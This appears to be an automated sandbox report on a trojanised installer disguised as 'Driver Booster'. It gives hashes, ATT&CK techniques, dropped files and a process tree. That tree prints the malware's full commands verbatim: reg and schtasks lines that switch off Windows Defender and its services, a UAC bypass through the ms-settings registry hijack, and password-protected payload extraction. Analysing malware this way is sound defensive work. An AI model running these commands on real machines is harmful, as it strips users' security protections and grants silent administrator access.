c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8

Analysis

max time kernel
208s
max time network
226s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
11-05-2022 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exe
Size

23.9MB
MD5

5e09313befea3f8ef5567f724ada60fe
SHA1

48fab70a85e6da34fa0070163f7ea6ac16fc5d37
SHA256

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8
SHA512

9df529de88a8b8c157f7deac7e3998cca8f0dabeebda58f6dbc6ca3c22970897a0b7a51fab3562462b65de8e7830b3437612ab6ae999b90607007d1ba0c20598

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Executes dropped EXE 8 IoCs

Processes:

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmpDriver.Booster.7.5.0.751.exeDriver.Booster.7.5.0.751.tmp7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exe

pid	process
4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
748	Driver.Booster.7.5.0.751.exe
5048	Driver.Booster.7.5.0.751.tmp
3328	7z.exe
1564	7z.exe
1660	7z.exe
1296	7z.exe
4148	iMtu_gQB.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmpWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 10 IoCs

Processes:

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmpDriver.Booster.7.5.0.751.tmp7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exe

pid	process
4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
5048	Driver.Booster.7.5.0.751.tmp
5048	Driver.Booster.7.5.0.751.tmp
5048	Driver.Booster.7.5.0.751.tmp
5048	Driver.Booster.7.5.0.751.tmp
3328	7z.exe
1564	7z.exe
1660	7z.exe
1296	7z.exe
4148	iMtu_gQB.exe

Drops file in Program Files directory 2 IoCs

Processes:

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
File created	C:\Program Files (x86)\is-HD55R.tmp	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4888 timeout.exe

pid	process
4888	timeout.exe

Modifies registry class 8 IoCs

Processes:

reg.exereg.exec83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmpDriver.Booster.7.5.0.751.tmpiMtu_gQB.exe

pid	process
4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
5048	Driver.Booster.7.5.0.751.tmp
5048	Driver.Booster.7.5.0.751.tmp
4148	iMtu_gQB.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exe

description	pid	process
Token: SeRestorePrivilege	3328	7z.exe
Token: 35	3328	7z.exe
Token: SeSecurityPrivilege	3328	7z.exe
Token: SeSecurityPrivilege	3328	7z.exe
Token: SeRestorePrivilege	1564	7z.exe
Token: 35	1564	7z.exe
Token: SeSecurityPrivilege	1564	7z.exe
Token: SeSecurityPrivilege	1564	7z.exe
Token: SeRestorePrivilege	1660	7z.exe
Token: 35	1660	7z.exe
Token: SeSecurityPrivilege	1660	7z.exe
Token: SeSecurityPrivilege	1660	7z.exe
Token: SeRestorePrivilege	1296	7z.exe
Token: 35	1296	7z.exe
Token: SeSecurityPrivilege	1296	7z.exe
Token: SeSecurityPrivilege	1296	7z.exe
Token: SeDebugPrivilege	4148	iMtu_gQB.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp

pid process

4624 c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exec83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmpDriver.Booster.7.5.0.751.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 1928 wrote to memory of 4624	1928	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exe	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
PID 1928 wrote to memory of 4624	1928	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exe	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
PID 1928 wrote to memory of 4624	1928	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exe	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
PID 4624 wrote to memory of 748	4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp	Driver.Booster.7.5.0.751.exe
PID 4624 wrote to memory of 748	4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp	Driver.Booster.7.5.0.751.exe
PID 4624 wrote to memory of 748	4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp	Driver.Booster.7.5.0.751.exe
PID 748 wrote to memory of 5048	748	Driver.Booster.7.5.0.751.exe	Driver.Booster.7.5.0.751.tmp
PID 748 wrote to memory of 5048	748	Driver.Booster.7.5.0.751.exe	Driver.Booster.7.5.0.751.tmp
PID 748 wrote to memory of 5048	748	Driver.Booster.7.5.0.751.exe	Driver.Booster.7.5.0.751.tmp
PID 4624 wrote to memory of 3700	4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp	WScript.exe
PID 4624 wrote to memory of 3700	4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp	WScript.exe
PID 4624 wrote to memory of 3700	4624	c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp	WScript.exe
PID 3700 wrote to memory of 3152	3700	WScript.exe	cmd.exe
PID 3700 wrote to memory of 3152	3700	WScript.exe	cmd.exe
PID 3700 wrote to memory of 3152	3700	WScript.exe	cmd.exe
PID 3152 wrote to memory of 316	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 316	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 316	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 228	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 228	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 228	3152	cmd.exe	reg.exe
PID 3700 wrote to memory of 3316	3700	WScript.exe	cmd.exe
PID 3700 wrote to memory of 3316	3700	WScript.exe	cmd.exe
PID 3700 wrote to memory of 3316	3700	WScript.exe	cmd.exe
PID 3152 wrote to memory of 1416	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1416	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1416	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1600	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1600	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1600	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1828	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1828	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 1828	3152	cmd.exe	reg.exe
PID 3316 wrote to memory of 2864	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 2864	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 2864	3316	cmd.exe	reg.exe
PID 3152 wrote to memory of 2012	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 2012	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 2012	3152	cmd.exe	reg.exe
PID 3316 wrote to memory of 1912	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 1912	3316	cmd.exe	reg.exe
PID 3316 wrote to memory of 1912	3316	cmd.exe	reg.exe
PID 3152 wrote to memory of 2052	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 2052	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 2052	3152	cmd.exe	reg.exe
PID 3700 wrote to memory of 3024	3700	WScript.exe	cmd.exe
PID 3700 wrote to memory of 3024	3700	WScript.exe	cmd.exe
PID 3700 wrote to memory of 3024	3700	WScript.exe	cmd.exe
PID 3152 wrote to memory of 4444	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 4444	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 4444	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 4348	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 4348	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 4348	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 2120	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 2120	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 2120	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 840	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 840	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 840	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 860	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 860	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 860	3152	cmd.exe	reg.exe
PID 3152 wrote to memory of 3640	3152	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exe
"C:\Users\Admin\AppData\Local\Temp\c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1928

C:\Users\Admin\AppData\Local\Temp\is-1LABG.tmp\c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1LABG.tmp\c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp" /SL5="$201D8,24416214,731648,C:\Users\Admin\AppData\Local\Temp\c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4624

C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe
"C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:748

C:\Users\Admin\AppData\Local\Temp\is-8JFOC.tmp\Driver.Booster.7.5.0.751.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8JFOC.tmp\Driver.Booster.7.5.0.751.tmp" /SL5="$8004C,19672100,361472,C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5048

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\eICJv\MMF.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\eICJv\DisableOAVProtection.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3152

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:316

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:228

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:1416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:1828

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:2052

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:2012

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:4444

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:2120

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:860

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:840

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
5⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:4944

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:452

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:4272

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:5024

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:3972

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:2216

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:4000

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
5⤵
PID:536

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
5⤵
PID:4988

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:5044

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1044

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2644

C:\Windows\SysWOW64\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
5⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4968

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:5092

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4924

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
- Modifies security service
PID:428

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\eICJv\DisableUserAccountControl.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
5⤵
- Modifies registry class
PID:2864

C:\Windows\SysWOW64\reg.exe
REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
5⤵
- Modifies registry class
PID:1912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\eICJv\main.bat" "
4⤵
PID:3024

C:\Windows\SysWOW64\mode.com
mode 65,10
5⤵
PID:964

C:\ProgramData\eICJv\7z.exe
7z.exe e file.zip -p___________26672pwd30077pwd1546___________ -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3328

C:\ProgramData\eICJv\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\ProgramData\eICJv\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\ProgramData\eICJv\iMtu_gQB.exe
"iMtu_gQB.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148

C:\ProgramData\eICJv\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\eICJv\DiskRemoval.bat" "
4⤵
PID:3952

C:\Windows\SysWOW64\timeout.exe
timeout /T 60 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:4888

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe
Filesize
19.1MB

MD5
8f338d9c273f69e1945a1199857f8344

SHA1
8e91bb8cafa23d1a7791bb7861b12904bb85d24e

SHA256
48052f534ffb591a0a70e45aced6fa54451553bc84421f2eabd630e076d7acf1

SHA512
2c81eb3caecd0d0a8d4711471bb56e7372e101b8ff2792af6df2327e7a0fef35799ed1e820e631b9cfd5c9562982b05e6e97b06ac86276c30bd7951eac453bdc

Download Submit
C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe
Filesize
19.1MB

MD5
8f338d9c273f69e1945a1199857f8344

SHA1
8e91bb8cafa23d1a7791bb7861b12904bb85d24e

SHA256
48052f534ffb591a0a70e45aced6fa54451553bc84421f2eabd630e076d7acf1

SHA512
2c81eb3caecd0d0a8d4711471bb56e7372e101b8ff2792af6df2327e7a0fef35799ed1e820e631b9cfd5c9562982b05e6e97b06ac86276c30bd7951eac453bdc

Download Submit
C:\ProgramData\eICJv\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\eICJv\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\eICJv\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\eICJv\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\eICJv\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\eICJv\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\eICJv\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\eICJv\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\eICJv\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\eICJv\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\eICJv\DisableOAVProtection.bat
Filesize
105KB

MD5
687cc2fd21ae18a05a907e3f0b27411b

SHA1
7a5129c77d6721ea8c3aceab90c1b5576638d14b

SHA256
6d09ddc3211e2840fcbcb463a22daf52664ef5d0f7234bb39ebeaaf5a0b8e632

SHA512
a69138598acb78954b99f986afa08d69ebd607a79d2733cfb904473651b34ff10aa6a6a08704f0d0bafafd962af7093b510addf3d1909523a8e8884c505e3b59

Download Submit
C:\ProgramData\eICJv\DisableUserAccountControl.bat
Filesize
17KB

MD5
e02bb39aab8a10eba07f113d7a548f9c

SHA1
2dcd92059dea564ef18b7bdbc931623a566628da

SHA256
96deb3e68b5bc4bd430624fd5d79113d0fb018b0afc401380b4662b4f0d9c617

SHA512
4b908a5b1eef6c799c057299d3b6c70aa567962edf42f390d330a5c6c0c2fd00872708f7f3d56d4323f7773ad1c15e663798e08f7c309c219555ee656de49223

Download Submit
C:\ProgramData\eICJv\DiskRemoval.bat
Filesize
254B

MD5
8c3372370db3c9dc3198135ad3162d20

SHA1
a30bf13314631716719094e52fd6e132f442fdbf

SHA256
63c360cd9f78fc0753a498f45b86c377416881e5560ea3de7908051c93bc0931

SHA512
6740d093a86c1f5121ee3c6db351152b9f97b06b0bad2a18545964d2e9e2d557cff07e6461e0772c0caa46ee265f82bf85ea78c512a98d377e0b8b261e7cd347

Download Submit
C:\ProgramData\eICJv\MMF.vbs
Filesize
30KB

MD5
bd64d967bf72703baaf72bfb5b353b4b

SHA1
